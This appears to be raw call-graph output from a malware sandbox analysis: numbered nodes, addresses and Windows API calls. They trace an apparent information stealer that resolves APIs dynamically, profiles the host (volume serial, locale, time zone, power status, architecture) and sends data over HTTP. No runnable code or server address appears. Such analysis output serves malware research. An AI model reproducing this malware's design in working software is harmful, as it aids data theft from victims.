14347->14348 14349 f045c0 2 API calls 14348->14349 14350 f03b68 14349->14350 14351 f045c0 2 API calls 14350->14351 14352 f03b81 14351->14352 14353 f045c0 2 API calls 14352->14353 14354 f03b9a 14353->14354 14355 f045c0 2 API calls 14354->14355 14356 f03bb3 14355->14356 14357 f045c0 2 API calls 14356->14357 14358 f03bcc 14357->14358 14359 f045c0 2 API calls 14358->14359 14360 f03be5 14359->14360 14361 f045c0 2 API calls 14360->14361 14362 f03bfe 14361->14362 14363 f045c0 2 API calls 14362->14363 14364 f03c17 14363->14364 14365 f045c0 2 API calls 14364->14365 14366 f03c30 14365->14366 14367 f045c0 2 API calls 14366->14367 14368 f03c49 14367->14368 14369 f045c0 2 API calls 14368->14369 14370 f03c62 14369->14370 14371 f045c0 2 API calls 14370->14371 14372 f03c7b 14371->14372 14373 f045c0 2 API calls 14372->14373 14374 f03c94 14373->14374 14375 f045c0 2 API calls 14374->14375 14376 f03cad 14375->14376 14377 f045c0 2 API calls 14376->14377 14378 f03cc6 14377->14378 14379 f045c0 2 API calls 14378->14379 14380 f03cdf 14379->14380 14381 f045c0 2 API calls 14380->14381 14382 f03cf8 14381->14382 14383 f045c0 2 API calls 14382->14383 14384 f03d11 14383->14384 14385 f045c0 2 API calls 14384->14385 14386 f03d2a 14385->14386 14387 f045c0 2 API calls 14386->14387 14388 f03d43 14387->14388 14389 f045c0 2 API calls 14388->14389 14390 f03d5c 14389->14390 14391 f045c0 2 API calls 14390->14391 14392 f03d75 14391->14392 14393 f045c0 2 API calls 14392->14393 14394 f03d8e 14393->14394 14395 f045c0 2 API calls 14394->14395 14396 f03da7 14395->14396 14397 f045c0 2 API calls 14396->14397 14398 f03dc0 14397->14398 14399 f045c0 2 API calls 14398->14399 14400 f03dd9 14399->14400 14401 f045c0 2 API calls 14400->14401 14402 f03df2 14401->14402 14403 f045c0 2 API calls 14402->14403 14404 f03e0b 14403->14404 14405 f045c0 2 API calls 14404->14405 14406 f03e24 14405->14406 14407 f045c0 2 API calls 14406->14407 14408 f03e3d 14407->14408 14409 f045c0 2 API calls 14408->14409 14410 f03e56 14409->14410 14411 f045c0 2 API calls 14410->14411 14412 f03e6f 14411->14412 14413 f045c0 2 API calls 14412->14413 14414 f03e88 14413->14414 14415 f045c0 2 API calls 14414->14415 14416 f03ea1 14415->14416 14417 f045c0 2 API calls 14416->14417 14418 f03eba 14417->14418 14419 f045c0 2 API calls 14418->14419 14420 f03ed3 14419->14420 14421 f045c0 2 API calls 14420->14421 14422 f03eec 14421->14422 14423 f045c0 2 API calls 14422->14423 14424 f03f05 14423->14424 14425 f045c0 2 API calls 14424->14425 14426 f03f1e 14425->14426 14427 f045c0 2 API calls 14426->14427 14428 f03f37 14427->14428 14429 f045c0 2 API calls 14428->14429 14430 f03f50 14429->14430 14431 f045c0 2 API calls 14430->14431 14432 f03f69 14431->14432 14433 f045c0 2 API calls 14432->14433 14434 f03f82 14433->14434 14435 f045c0 2 API calls 14434->14435 14436 f03f9b 14435->14436 14437 f045c0 2 API calls 14436->14437 14438 f03fb4 14437->14438 14439 f045c0 2 API calls 14438->14439 14440 f03fcd 14439->14440 14441 f045c0 2 API calls 14440->14441 14442 f03fe6 14441->14442 14443 f045c0 2 API calls 14442->14443 14444 f03fff 14443->14444 14445 f045c0 2 API calls 14444->14445 14446 f04018 14445->14446 14447 f045c0 2 API calls 14446->14447 14448 f04031 14447->14448 14449 f045c0 2 API calls 14448->14449 14450 f0404a 14449->14450 14451 f045c0 2 API calls 14450->14451 14452 f04063 14451->14452 14453 f045c0 2 API calls 14452->14453 14454 f0407c 14453->14454 14455 f045c0 2 API calls 14454->14455 14456 f04095 14455->14456 14457 f045c0 2 API calls 14456->14457 14458 f040ae 14457->14458 14459 f045c0 2 API calls 14458->14459 14460 f040c7 14459->14460 14461 f045c0 2 API calls 14460->14461 14462 f040e0 14461->14462 14463 f045c0 2 API calls 14462->14463 14464 f040f9 14463->14464 14465 f045c0 2 API calls 14464->14465 14466 f04112 14465->14466 14467 f045c0 2 API calls 14466->14467 14468 f0412b 14467->14468 14469 f045c0 2 API calls 14468->14469 14470 f04144 14469->14470 14471 f045c0 2 API calls 14470->14471 14472 f0415d 14471->14472 14473 f045c0 2 API calls 14472->14473 14474 f04176 14473->14474 14475 f045c0 2 API calls 14474->14475 14476 f0418f 14475->14476 14477 f045c0 2 API calls 14476->14477 14478 f041a8 14477->14478 14479 f045c0 2 API calls 14478->14479 14480 f041c1 14479->14480 14481 f045c0 2 API calls 14480->14481 14482 f041da 14481->14482 14483 f045c0 2 API calls 14482->14483 14484 f041f3 14483->14484 14485 f045c0 2 API calls 14484->14485 14486 f0420c 14485->14486 14487 f045c0 2 API calls 14486->14487 14488 f04225 14487->14488 14489 f045c0 2 API calls 14488->14489 14490 f0423e 14489->14490 14491 f045c0 2 API calls 14490->14491 14492 f04257 14491->14492 14493 f045c0 2 API calls 14492->14493 14494 f04270 14493->14494 14495 f045c0 2 API calls 14494->14495 14496 f04289 14495->14496 14497 f045c0 2 API calls 14496->14497 14498 f042a2 14497->14498 14499 f045c0 2 API calls 14498->14499 14500 f042bb 14499->14500 14501 f045c0 2 API calls 14500->14501 14502 f042d4 14501->14502 14503 f045c0 2 API calls 14502->14503 14504 f042ed 14503->14504 14505 f045c0 2 API calls 14504->14505 14506 f04306 14505->14506 14507 f045c0 2 API calls 14506->14507 14508 f0431f 14507->14508 14509 f045c0 2 API calls 14508->14509 14510 f04338 14509->14510 14511 f045c0 2 API calls 14510->14511 14512 f04351 14511->14512 14513 f045c0 2 API calls 14512->14513 14514 f0436a 14513->14514 14515 f045c0 2 API calls 14514->14515 14516 f04383 14515->14516 14517 f045c0 2 API calls 14516->14517 14518 f0439c 14517->14518 14519 f045c0 2 API calls 14518->14519 14520 f043b5 14519->14520 14521 f045c0 2 API calls 14520->14521 14522 f043ce 14521->14522 14523 f045c0 2 API calls 14522->14523 14524 f043e7 14523->14524 14525 f045c0 2 API calls 14524->14525 14526 f04400 14525->14526 14527 f045c0 2 API calls 14526->14527 14528 f04419 14527->14528 14529 f045c0 2 API calls 14528->14529 14530 f04432 14529->14530 14531 f045c0 2 API calls 14530->14531 14532 f0444b 14531->14532 14533 f045c0 2 API calls 14532->14533 14534 f04464 14533->14534 14535 f045c0 2 API calls 14534->14535 14536 f0447d 14535->14536 14537 f045c0 2 API calls 14536->14537 14538 f04496 14537->14538 14539 f045c0 2 API calls 14538->14539 14540 f044af 14539->14540 14541 f045c0 2 API calls 14540->14541 14542 f044c8 14541->14542 14543 f045c0 2 API calls 14542->14543 14544 f044e1 14543->14544 14545 f045c0 2 API calls 14544->14545 14546 f044fa 14545->14546 14547 f045c0 2 API calls 14546->14547 14548 f04513 14547->14548 14549 f045c0 2 API calls 14548->14549 14550 f0452c 14549->14550 14551 f045c0 2 API calls 14550->14551 14552 f04545 14551->14552 14553 f045c0 2 API calls 14552->14553 14554 f0455e 14553->14554 14555 f045c0 2 API calls 14554->14555 14556 f04577 14555->14556 14557 f045c0 2 API calls 14556->14557 14558 f04590 14557->14558 14559 f045c0 2 API calls 14558->14559 14560 f045a9 14559->14560 14561 f19c10 14560->14561 14562 f19c20 43 API calls 14561->14562 14563 f1a036 8 API calls 14561->14563 14562->14563 14564 f1a146 14563->14564 14565 f1a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14563->14565 14566 f1a153 8 API calls 14564->14566 14567 f1a216 14564->14567 14565->14564 14566->14567 14568 f1a298 14567->14568 14569 f1a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14567->14569 14570 f1a2a5 6 API calls 14568->14570 14571 f1a337 14568->14571 14569->14568 14570->14571 14572 f1a344 9 API calls 14571->14572 14573 f1a41f 14571->14573 14572->14573 14574 f1a4a2 14573->14574 14575 f1a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14573->14575 14576 f1a4ab GetProcAddress GetProcAddress 14574->14576 14577 f1a4dc 14574->14577 14575->14574 14576->14577 14578 f1a515 14577->14578 14579 f1a4e5 GetProcAddress GetProcAddress 14577->14579 14580 f1a612 14578->14580 14581 f1a522 10 API calls 14578->14581 14579->14578 14582 f1a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14580->14582 14583 f1a67d 14580->14583 14581->14580 14582->14583 14584 f1a686 GetProcAddress 14583->14584 14585 f1a69e 14583->14585 14584->14585 14586 f1a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14585->14586 14587 f15ca3 14585->14587 14586->14587 14588 f01590 14587->14588 15709 f01670 14588->15709 14591 f1a7a0 lstrcpy 14592 f015b5 14591->14592 14593 f1a7a0 lstrcpy 14592->14593 14594 f015c7 14593->14594 14595 f1a7a0 lstrcpy 14594->14595 14596 f015d9 14595->14596 14597 f1a7a0 lstrcpy 14596->14597 14598 f01663 14597->14598 14599 f15510 14598->14599 14600 f15521 14599->14600 14601 f1a820 2 API calls 14600->14601 14602 f1552e 14601->14602 14603 f1a820 2 API calls 14602->14603 14604 f1553b 14603->14604 14605 f1a820 2 API calls 14604->14605 14606 f15548 14605->14606 14607 f1a740 lstrcpy 14606->14607 14608 f15555 14607->14608 14609 f1a740 lstrcpy 14608->14609 14610 f15562 14609->14610 14611 f1a740 lstrcpy 14610->14611 14612 f1556f 14611->14612 14613 f1a740 lstrcpy 14612->14613 14639 f1557c 14613->14639 14614 f1a7a0 lstrcpy 14614->14639 14615 f15643 StrCmpCA 14615->14639 14616 f156a0 StrCmpCA 14617 f157dc 14616->14617 14616->14639 14618 f1a8a0 lstrcpy 14617->14618 14619 f157e8 14618->14619 14620 f1a820 2 API calls 14619->14620 14622 f157f6 14620->14622 14621 f15856 StrCmpCA 14624 f15991 14621->14624 14621->14639 14623 f1a820 2 API calls 14622->14623 14626 f15805 14623->14626 14627 f1a8a0 lstrcpy 14624->14627 14625 f1a740 lstrcpy 14625->14639 14628 f01670 lstrcpy 14626->14628 14630 f1599d 14627->14630 14653 f15811 14628->14653 14629 f01590 lstrcpy 14629->14639 14632 f1a820 2 API calls 14630->14632 14631 f1a820 lstrlen lstrcpy 14631->14639 14633 f159ab 14632->14633 14636 f1a820 2 API calls 14633->14636 14634 f15a0b StrCmpCA 14637 f15a16 Sleep 14634->14637 14638 f15a28 14634->14638 14635 f152c0 25 API calls 14635->14639 14640 f159ba 14636->14640 14637->14639 14641 f1a8a0 lstrcpy 14638->14641 14639->14614 14639->14615 14639->14616 14639->14621 14639->14625 14639->14629 14639->14631 14639->14634 14639->14635 14648 f1a8a0 lstrcpy 14639->14648 14649 f1578a StrCmpCA 14639->14649 14651 f1593f StrCmpCA 14639->14651 14652 f151f0 20 API calls 14639->14652 14642 f01670 lstrcpy 14640->14642 14643 f15a34 14641->14643 14642->14653 14644 f1a820 2 API calls 14643->14644 14645 f15a43 14644->14645 14646 f1a820 2 API calls 14645->14646 14647 f15a52 14646->14647 14650 f01670 lstrcpy 14647->14650 14648->14639 14649->14639 14650->14653 14651->14639 14652->14639 14653->13706 14655 f17553 GetVolumeInformationA 14654->14655 14656 f1754c 14654->14656 14657 f17591 14655->14657 14656->14655 14658 f175fc GetProcessHeap RtlAllocateHeap 14657->14658 14659 f17619 14658->14659 14660 f17628 wsprintfA 14658->14660 14661 f1a740 lstrcpy 14659->14661 14662 f1a740 lstrcpy 14660->14662 14663 f15da7 14661->14663 14662->14663 14663->13727 14665 f1a7a0 lstrcpy 14664->14665 14666 f04899 14665->14666 15718 f047b0 14666->15718 14668 f048a5 14669 f1a740 lstrcpy 14668->14669 14670 f048d7 14669->14670 14671 f1a740 lstrcpy 14670->14671 14672 f048e4 14671->14672 14673 f1a740 lstrcpy 14672->14673 14674 f048f1 14673->14674 14675 f1a740 lstrcpy 14674->14675 14676 f048fe 14675->14676 14677 f1a740 lstrcpy 14676->14677 14678 f0490b InternetOpenA StrCmpCA 14677->14678 14679 f04944 14678->14679 14680 f04ecb InternetCloseHandle 14679->14680 15724 f18b60 14679->15724 14681 f04ee8 14680->14681 15739 f09ac0 CryptStringToBinaryA 14681->15739 14683 f04963 15732 f1a920 14683->15732 14686 f04976 14688 f1a8a0 lstrcpy 14686->14688 14693 f0497f 14688->14693 14689 f1a820 2 API calls 14690 f04f05 14689->14690 14691 f1a9b0 4 API calls 14690->14691 14694 f04f1b 14691->14694 14692 f04f27 ctype 14695 f1a7a0 lstrcpy 14692->14695 14697 f1a9b0 4 API calls 14693->14697 14696 f1a8a0 lstrcpy 14694->14696 14708 f04f57 14695->14708 14696->14692 14698 f049a9 14697->14698 14699 f1a8a0 lstrcpy 14698->14699 14700 f049b2 14699->14700 14701 f1a9b0 4 API calls 14700->14701 14702 f049d1 14701->14702 14703 f1a8a0 lstrcpy 14702->14703 14704 f049da 14703->14704 14705 f1a920 3 API calls 14704->14705 14706 f049f8 14705->14706 14707 f1a8a0 lstrcpy 14706->14707 14709 f04a01 14707->14709 14708->13730 14710 f1a9b0 4 API calls 14709->14710 14711 f04a20 14710->14711 14712 f1a8a0 lstrcpy 14711->14712 14713 f04a29 14712->14713 14714 f1a9b0 4 API calls 14713->14714 14715 f04a48 14714->14715 14716 f1a8a0 lstrcpy 14715->14716 14717 f04a51 14716->14717 14718 f1a9b0 4 API calls 14717->14718 14719 f04a7d 14718->14719 14720 f1a920 3 API calls 14719->14720 14721 f04a84 14720->14721 14722 f1a8a0 lstrcpy 14721->14722 14723 f04a8d 14722->14723 14724 f04aa3 InternetConnectA 14723->14724 14724->14680 14725 f04ad3 HttpOpenRequestA 14724->14725 14727 f04b28 14725->14727 14728 f04ebe InternetCloseHandle 14725->14728 14729 f1a9b0 4 API calls 14727->14729 14728->14680 14730 f04b3c 14729->14730 14731 f1a8a0 lstrcpy 14730->14731 14732 f04b45 14731->14732 14733 f1a920 3 API calls 14732->14733 14734 f04b63 14733->14734 14735 f1a8a0 lstrcpy 14734->14735 14736 f04b6c 14735->14736 14737 f1a9b0 4 API calls 14736->14737 14738 f04b8b 14737->14738 14739 f1a8a0 lstrcpy 14738->14739 14740 f04b94 14739->14740 14741 f1a9b0 4 API calls 14740->14741 14742 f04bb5 14741->14742 14743 f1a8a0 lstrcpy 14742->14743 14744 f04bbe 14743->14744 14745 f1a9b0 4 API calls 14744->14745 14746 f04bde 14745->14746 14747 f1a8a0 lstrcpy 14746->14747 14748 f04be7 14747->14748 14749 f1a9b0 4 API calls 14748->14749 14750 f04c06 14749->14750 14751 f1a8a0 lstrcpy 14750->14751 14752 f04c0f 14751->14752 14753 f1a920 3 API calls 14752->14753 14754 f04c2d 14753->14754 14755 f1a8a0 lstrcpy 14754->14755 14756 f04c36 14755->14756 14757 f1a9b0 4 API calls 14756->14757 14758 f04c55 14757->14758 14759 f1a8a0 lstrcpy 14758->14759 14760 f04c5e 14759->14760 14761 f1a9b0 4 API calls 14760->14761 14762 f04c7d 14761->14762 14763 f1a8a0 lstrcpy 14762->14763 14764 f04c86 14763->14764 14765 f1a920 3 API calls 14764->14765 14766 f04ca4 14765->14766 14767 f1a8a0 lstrcpy 14766->14767 14768 f04cad 14767->14768 14769 f1a9b0 4 API calls 14768->14769 14770 f04ccc 14769->14770 14771 f1a8a0 lstrcpy 14770->14771 14772 f04cd5 14771->14772 14773 f1a9b0 4 API calls 14772->14773 14774 f04cf6 14773->14774 14775 f1a8a0 lstrcpy 14774->14775 14776 f04cff 14775->14776 14777 f1a9b0 4 API calls 14776->14777 14778 f04d1f 14777->14778 14779 f1a8a0 lstrcpy 14778->14779 14780 f04d28 14779->14780 14781 f1a9b0 4 API calls 14780->14781 14782 f04d47 14781->14782 14783 f1a8a0 lstrcpy 14782->14783 14784 f04d50 14783->14784 14785 f1a920 3 API calls 14784->14785 14786 f04d6e 14785->14786 14787 f1a8a0 lstrcpy 14786->14787 14788 f04d77 14787->14788 14789 f1a740 lstrcpy 14788->14789 14790 f04d92 14789->14790 14791 f1a920 3 API calls 14790->14791 14792 f04db3 14791->14792 14793 f1a920 3 API calls 14792->14793 14794 f04dba 14793->14794 14795 f1a8a0 lstrcpy 14794->14795 14796 f04dc6 14795->14796 14797 f04de7 lstrlen 14796->14797 14798 f04dfa 14797->14798 14799 f04e03 lstrlen 14798->14799 15738 f1aad0 14799->15738 14801 f04e13 HttpSendRequestA 14802 f04e32 InternetReadFile 14801->14802 14803 f04e67 InternetCloseHandle 14802->14803 14808 f04e5e 14802->14808 14806 f1a800 14803->14806 14805 f1a9b0 4 API calls 14805->14808 14806->14728 14807 f1a8a0 lstrcpy 14807->14808 14808->14802 14808->14803 14808->14805 14808->14807 15745 f1aad0 14809->15745 14811 f117c4 StrCmpCA 14812 f117cf ExitProcess 14811->14812 14824 f117d7 14811->14824 14813 f119c2 14813->13732 14814 f118f1 StrCmpCA 14814->14824 14815 f11951 StrCmpCA 14815->14824 14816 f11970 StrCmpCA 14816->14824 14817 f11913 StrCmpCA 14817->14824 14818 f11932 StrCmpCA 14818->14824 14819 f1185d StrCmpCA 14819->14824 14820 f1187f StrCmpCA 14820->14824 14821 f118ad StrCmpCA 14821->14824 14822 f118cf StrCmpCA 14822->14824 14823 f1a820 lstrlen lstrcpy 14823->14824 14824->14813 14824->14814 14824->14815 14824->14816 14824->14817 14824->14818 14824->14819 14824->14820 14824->14821 14824->14822 14824->14823 14826 f1a7a0 lstrcpy 14825->14826 14827 f05979 14826->14827 14828 f047b0 2 API calls 14827->14828 14829 f05985 14828->14829 14830 f1a740 lstrcpy 14829->14830 14831 f059ba 14830->14831 14832 f1a740 lstrcpy 14831->14832 14833 f059c7 14832->14833 14834 f1a740 lstrcpy 14833->14834 14835 f059d4 14834->14835 14836 f1a740 lstrcpy 14835->14836 14837 f059e1 14836->14837 14838 f1a740 lstrcpy 14837->14838 14839 f059ee InternetOpenA StrCmpCA 14838->14839 14840 f05a1d 14839->14840 14841 f05fc3 InternetCloseHandle 14840->14841 14842 f18b60 3 API calls 14840->14842 14843 f05fe0 14841->14843 14844 f05a3c 14842->14844 14846 f09ac0 4 API calls 14843->14846 14845 f1a920 3 API calls 14844->14845 14847 f05a4f 14845->14847 14848 f05fe6 14846->14848 14849 f1a8a0 lstrcpy 14847->14849 14850 f1a820 2 API calls 14848->14850 14852 f0601f ctype 14848->14852 14854 f05a58 14849->14854 14851 f05ffd 14850->14851 14853 f1a9b0 4 API calls 14851->14853 14857 f1a7a0 lstrcpy 14852->14857 14855 f06013 14853->14855 14858 f1a9b0 4 API calls 14854->14858 14856 f1a8a0 lstrcpy 14855->14856 14856->14852 14866 f0604f 14857->14866 14859 f05a82 14858->14859 14860 f1a8a0 lstrcpy 14859->14860 14861 f05a8b 14860->14861 14862 f1a9b0 4 API calls 14861->14862 14863 f05aaa 14862->14863 14864 f1a8a0 lstrcpy 14863->14864 14865 f05ab3 14864->14865 14867 f1a920 3 API calls 14865->14867 14866->13738 14868 f05ad1 14867->14868 14869 f1a8a0 lstrcpy 14868->14869 14870 f05ada 14869->14870 14871 f1a9b0 4 API calls 14870->14871 14872 f05af9 14871->14872 14873 f1a8a0 lstrcpy 14872->14873 14874 f05b02 14873->14874 14875 f1a9b0 4 API calls 14874->14875 14876 f05b21 14875->14876 14877 f1a8a0 lstrcpy 14876->14877 14878 f05b2a 14877->14878 14879 f1a9b0 4 API calls 14878->14879 14880 f05b56 14879->14880 14881 f1a920 3 API calls 14880->14881 14882 f05b5d 14881->14882 14883 f1a8a0 lstrcpy 14882->14883 14884 f05b66 14883->14884 14885 f05b7c InternetConnectA 14884->14885 14885->14841 14886 f05bac HttpOpenRequestA 14885->14886 14888 f05fb6 InternetCloseHandle 14886->14888 14889 f05c0b 14886->14889 14888->14841 14890 f1a9b0 4 API calls 14889->14890 14891 f05c1f 14890->14891 14892 f1a8a0 lstrcpy 14891->14892 14893 f05c28 14892->14893 14894 f1a920 3 API calls 14893->14894 14895 f05c46 14894->14895 14896 f1a8a0 lstrcpy 14895->14896 14897 f05c4f 14896->14897 14898 f1a9b0 4 API calls 14897->14898 14899 f05c6e 14898->14899 14900 f1a8a0 lstrcpy 14899->14900 14901 f05c77 14900->14901 14902 f1a9b0 4 API calls 14901->14902 14903 f05c98 14902->14903 14904 f1a8a0 lstrcpy 14903->14904 14905 f05ca1 14904->14905 14906 f1a9b0 4 API calls 14905->14906 14907 f05cc1 14906->14907 14908 f1a8a0 lstrcpy 14907->14908 14909 f05cca 14908->14909 14910 f1a9b0 4 API calls 14909->14910 14911 f05ce9 14910->14911 14912 f1a8a0 lstrcpy 14911->14912 14913 f05cf2 14912->14913 14914 f1a920 3 API calls 14913->14914 14915 f05d10 14914->14915 14916 f1a8a0 lstrcpy 14915->14916 14917 f05d19 14916->14917 14918 f1a9b0 4 API calls 14917->14918 14919 f05d38 14918->14919 14920 f1a8a0 lstrcpy 14919->14920 14921 f05d41 14920->14921 14922 f1a9b0 4 API calls 14921->14922 14923 f05d60 14922->14923 14924 f1a8a0 lstrcpy 14923->14924 14925 f05d69 14924->14925 14926 f1a920 3 API calls 14925->14926 14927 f05d87 14926->14927 14928 f1a8a0 lstrcpy 14927->14928 14929 f05d90 14928->14929 14930 f1a9b0 4 API calls 14929->14930 14931 f05daf 14930->14931 14932 f1a8a0 lstrcpy 14931->14932 14933 f05db8 14932->14933 14934 f1a9b0 4 API calls 14933->14934 14935 f05dd9 14934->14935 14936 f1a8a0 lstrcpy 14935->14936 14937 f05de2 14936->14937 14938 f1a9b0 4 API calls 14937->14938 14939 f05e02 14938->14939 14940 f1a8a0 lstrcpy 14939->14940 14941 f05e0b 14940->14941 14942 f1a9b0 4 API calls 14941->14942 14943 f05e2a 14942->14943 14944 f1a8a0 lstrcpy 14943->14944 14945 f05e33 14944->14945 14946 f1a920 3 API calls 14945->14946 14947 f05e54 14946->14947 14948 f1a8a0 lstrcpy 14947->14948 14949 f05e5d 14948->14949 14950 f05e70 lstrlen 14949->14950 15746 f1aad0 14950->15746 14952 f05e81 lstrlen GetProcessHeap RtlAllocateHeap 15747 f1aad0 14952->15747 14954 f05eae lstrlen 14955 f05ebe 14954->14955 14956 f05ed7 lstrlen 14955->14956 14957 f05ee7 14956->14957 14958 f05ef0 lstrlen 14957->14958 14959 f05f04 14958->14959 14960 f05f1a lstrlen 14959->14960 15748 f1aad0 14960->15748 14962 f05f2a HttpSendRequestA 14963 f05f35 InternetReadFile 14962->14963 14964 f05f6a InternetCloseHandle 14963->14964 14968 f05f61 14963->14968 14964->14888 14966 f1a9b0 4 API calls 14966->14968 14967 f1a8a0 lstrcpy 14967->14968 14968->14963 14968->14964 14968->14966 14968->14967 14971 f11077 14969->14971 14970 f11151 14970->13740 14971->14970 14972 f1a820 lstrlen lstrcpy 14971->14972 14972->14971 14974 f10db7 14973->14974 14975 f10f17 14974->14975 14976 f10ea4 StrCmpCA 14974->14976 14977 f10e27 StrCmpCA 14974->14977 14978 f10e67 StrCmpCA 14974->14978 14979 f1a820 lstrlen lstrcpy 14974->14979 14975->13748 14976->14974 14977->14974 14978->14974 14979->14974 14984 f10f67 14980->14984 14981 f10fb2 StrCmpCA 14981->14984 14982 f11044 14982->13756 14983 f1a820 lstrlen lstrcpy 14983->14984 14984->14981 14984->14982 14984->14983 14986 f1a740 lstrcpy 14985->14986 14987 f11a26 14986->14987 14988 f1a9b0 4 API calls 14987->14988 14989 f11a37 14988->14989 14990 f1a8a0 lstrcpy 14989->14990 14991 f11a40 14990->14991 14992 f1a9b0 4 API calls 14991->14992 14993 f11a5b 14992->14993 14994 f1a8a0 lstrcpy 14993->14994 14995 f11a64 14994->14995 14996 f1a9b0 4 API calls 14995->14996 14997 f11a7d 14996->14997 14998 f1a8a0 lstrcpy 14997->14998 14999 f11a86 14998->14999 15000 f1a9b0 4 API calls 14999->15000 15001 f11aa1 15000->15001 15002 f1a8a0 lstrcpy 15001->15002 15003 f11aaa 15002->15003 15004 f1a9b0 4 API calls 15003->15004 15005 f11ac3 15004->15005 15006 f1a8a0 lstrcpy 15005->15006 15007 f11acc 15006->15007 15008 f1a9b0 4 API calls 15007->15008 15009 f11ae7 15008->15009 15010 f1a8a0 lstrcpy 15009->15010 15011 f11af0 15010->15011 15012 f1a9b0 4 API calls 15011->15012 15013 f11b09 15012->15013 15014 f1a8a0 lstrcpy 15013->15014 15015 f11b12 15014->15015 15016 f1a9b0 4 API calls 15015->15016 15017 f11b2d 15016->15017 15018 f1a8a0 lstrcpy 15017->15018 15019 f11b36 15018->15019 15020 f1a9b0 4 API calls 15019->15020 15021 f11b4f 15020->15021 15022 f1a8a0 lstrcpy 15021->15022 15023 f11b58 15022->15023 15024 f1a9b0 4 API calls 15023->15024 15025 f11b76 15024->15025 15026 f1a8a0 lstrcpy 15025->15026 15027 f11b7f 15026->15027 15028 f17500 6 API calls 15027->15028 15029 f11b96 15028->15029 15030 f1a920 3 API calls 15029->15030 15031 f11ba9 15030->15031 15032 f1a8a0 lstrcpy 15031->15032 15033 f11bb2 15032->15033 15034 f1a9b0 4 API calls 15033->15034 15035 f11bdc 15034->15035 15036 f1a8a0 lstrcpy 15035->15036 15037 f11be5 15036->15037 15038 f1a9b0 4 API calls 15037->15038 15039 f11c05 15038->15039 15040 f1a8a0 lstrcpy 15039->15040 15041 f11c0e 15040->15041 15749 f17690 GetProcessHeap RtlAllocateHeap 15041->15749 15044 f1a9b0 4 API calls 15045 f11c2e 15044->15045 15046 f1a8a0 lstrcpy 15045->15046 15047 f11c37 15046->15047 15048 f1a9b0 4 API calls 15047->15048 15049 f11c56 15048->15049 15050 f1a8a0 lstrcpy 15049->15050 15051 f11c5f 15050->15051 15052 f1a9b0 4 API calls 15051->15052 15053 f11c80 15052->15053 15054 f1a8a0 lstrcpy 15053->15054 15055 f11c89 15054->15055 15756 f177c0 GetCurrentProcess IsWow64Process 15055->15756 15058 f1a9b0 4 API calls 15059 f11ca9 15058->15059 15060 f1a8a0 lstrcpy 15059->15060 15061 f11cb2 15060->15061 15062 f1a9b0 4 API calls 15061->15062 15063 f11cd1 15062->15063 15064 f1a8a0 lstrcpy 15063->15064 15065 f11cda 15064->15065 15066 f1a9b0 4 API calls 15065->15066 15067 f11cfb 15066->15067 15068 f1a8a0 lstrcpy 15067->15068 15069 f11d04 15068->15069 15070 f17850 3 API calls 15069->15070 15071 f11d14 15070->15071 15072 f1a9b0 4 API calls 15071->15072 15073 f11d24 15072->15073 15074 f1a8a0 lstrcpy 15073->15074 15075 f11d2d 15074->15075 15076 f1a9b0 4 API calls 15075->15076 15077 f11d4c 15076->15077 15078 f1a8a0 lstrcpy 15077->15078 15079 f11d55 15078->15079 15080 f1a9b0 4 API calls 15079->15080 15081 f11d75 15080->15081 15082 f1a8a0 lstrcpy 15081->15082 15083 f11d7e 15082->15083 15084 f178e0 3 API calls 15083->15084 15085 f11d8e 15084->15085 15086 f1a9b0 4 API calls 15085->15086 15087 f11d9e 15086->15087 15088 f1a8a0 lstrcpy 15087->15088 15089 f11da7 15088->15089 15090 f1a9b0 4 API calls 15089->15090 15091 f11dc6 15090->15091 15092 f1a8a0 lstrcpy 15091->15092 15093 f11dcf 15092->15093 15094 f1a9b0 4 API calls 15093->15094 15095 f11df0 15094->15095 15096 f1a8a0 lstrcpy 15095->15096 15097 f11df9 15096->15097 15758 f17980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15097->15758 15100 f1a9b0 4 API calls 15101 f11e19 15100->15101 15102 f1a8a0 lstrcpy 15101->15102 15103 f11e22 15102->15103 15104 f1a9b0 4 API calls 15103->15104 15105 f11e41 15104->15105 15106 f1a8a0 lstrcpy 15105->15106 15107 f11e4a 15106->15107 15108 f1a9b0 4 API calls 15107->15108 15109 f11e6b 15108->15109 15110 f1a8a0 lstrcpy 15109->15110 15111 f11e74 15110->15111 15760 f17a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15111->15760 15114 f1a9b0 4 API calls 15115 f11e94 15114->15115 15116 f1a8a0 lstrcpy 15115->15116 15117 f11e9d 15116->15117 15118 f1a9b0 4 API calls 15117->15118 15119 f11ebc 15118->15119 15120 f1a8a0 lstrcpy 15119->15120 15121 f11ec5 15120->15121 15122 f1a9b0 4 API calls 15121->15122 15123 f11ee5 15122->15123 15124 f1a8a0 lstrcpy 15123->15124 15125 f11eee 15124->15125 15763 f17b00 GetUserDefaultLocaleName 15125->15763 15128 f1a9b0 4 API calls 15129 f11f0e 15128->15129 15130 f1a8a0 lstrcpy 15129->15130 15131 f11f17 15130->15131 15132 f1a9b0 4 API calls 15131->15132 15133 f11f36 15132->15133 15134 f1a8a0 lstrcpy 15133->15134 15135 f11f3f 15134->15135 15136 f1a9b0 4 API calls 15135->15136 15137 f11f60 15136->15137 15138 f1a8a0 lstrcpy 15137->15138 15139 f11f69 15138->15139 15767 f17b90 15139->15767 15141 f11f80 15142 f1a920 3 API calls 15141->15142 15143 f11f93 15142->15143 15144 f1a8a0 lstrcpy 15143->15144 15145 f11f9c 15144->15145 15146 f1a9b0 4 API calls 15145->15146 15147 f11fc6 15146->15147 15148 f1a8a0 lstrcpy 15147->15148 15149 f11fcf 15148->15149 15150 f1a9b0 4 API calls 15149->15150 15151 f11fef 15150->15151 15152 f1a8a0 lstrcpy 15151->15152 15153 f11ff8 15152->15153 15779 f17d80 GetSystemPowerStatus 15153->15779 15156 f1a9b0 4 API calls 15157 f12018 15156->15157 15158 f1a8a0 lstrcpy 15157->15158 15159 f12021 15158->15159 15160 f1a9b0 4 API calls 15159->15160 15161 f12040 15160->15161 15162 f1a8a0 lstrcpy 15161->15162 15163 f12049 15162->15163 15164 f1a9b0 4 API calls 15163->15164 15165 f1206a 15164->15165 15166 f1a8a0 lstrcpy 15165->15166 15167 f12073 15166->15167 15168 f1207e GetCurrentProcessId 15167->15168 15781 